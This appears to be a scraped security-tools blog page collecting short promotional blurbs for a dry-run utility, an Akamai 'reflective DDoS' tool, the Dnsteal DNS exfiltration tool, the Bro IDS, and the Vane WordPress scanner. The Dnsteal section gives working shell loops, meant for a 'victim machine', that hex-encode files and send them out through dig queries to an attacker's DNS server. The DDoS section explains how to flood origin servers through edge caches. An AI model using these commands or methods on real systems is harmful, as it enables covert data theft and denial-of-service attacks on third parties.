rm -rf pic*
Are you sure? Are you one hundred percent sure?
maybe…
… allows you to run a command and see what it does to your files without actually doing it! After reviewing the operations listed, you can then decide whether you really want these things to happen or not.
What is this sorcery?!?
Continue reading Are you sure? Are you one hundred percent sure?
download
Akamai Reflective DDoS Tool
Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.
How it works…
Based off the research done at NCC: (https://dl.packetstormsecurity.net/papers/attack/the_pentesters_guide_to_akamai.pdf)
Akamai boast around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc, to ensure that a minimal amount of requests actually hit your origin web-server beign protected. However, the issue with caching is that you cannot cache something that is non-deterministic, I.E a search result. A search that has not been requested before is likely not in the cache, and will result in a Cache-Miss, and the Akamai edge node requesting the resource from the origin server itself.
What this tool does is, provided a list of Akamai edge nodes and a valid cache missing request, produces multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with 100,000 Akamai edge node list, and a request which resulting in 10KB hitting the origin, if my calculations are correct, thats around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.
Finding Akamai Edge Nodes
To find Akamai Edge Nodes, the following script has been included:
# python ARDT_Akamai_EdgeNode_Finder.py
This can be edited quite easily to find more, it then saves the IPS automatically.
Dnsteal is a Data Exfiltration Tool Through DNS Requests for stealthily sending files over DNS requests. Once setup and run successfully it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.
Install & start server
git clone https://github.com/dutchcoin/dnsteal.git /opt/dnsteal
cd /opt/dnsteal && python dnsteal.py
Transfer file from the victim
On the victim machine, you simply can do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
![[000001]](https://7io.net/wp-content/uploads/2015/09/000001.png?b5e3f8){kind=small}
On the server side you will see the file transfer start:
![[000003]](https://7io.net/wp-content/uploads/2015/09/000003.png?b5e3f8)
When the transfer is finished you must stop the server with CTRL-C to save the file and view the md5sum
You can verify the md5sum on the victims machine by running
md5sum filename
Features:
Support for multiple files
Dnstool supports multiple files to be exfiltereted. Use as below.
for filename in $(ls); do for b in $(xxd -p $f); do dig +short@server %b.$filename.com; done; done
gzip compression supported
It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the “-z” switch:
python dnsteal.py 127.0.0.1 –z
Then on the victim machine send a Gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
For multiple, gzip compressed files use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done
download bro
Before installing Bro, you’ll need to ensure that some dependencies are in place.
Bro requires the following libraries and tools to be installed before you begin:
- Libpcap (http://www.tcpdump.org)
- OpenSSL libraries (http://www.openssl.org)
- BIND8 library
- Libz
- Bash (for BroControl)
- Python (for BroControl)
To build Bro from source, the following additional dependencies are required:
- CMake 2.8 or greater (http://www.cmake.org)
- Make
- C/C++ compiler
- SWIG (http://www.swig.org)
- Bison (GNU Parser Generator)
- Flex (Fast Lexical Analyzer)
- Libpcap headers (http://www.tcpdump.org)
- OpenSSL headers (http://www.openssl.org)
- zlib headers
- Perl
Source
Vane is a GPL fork of the now non-free popular wordpress vulnerability scanner WPScan.
sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development
Continue reading linux – vane (a fork of wpscan)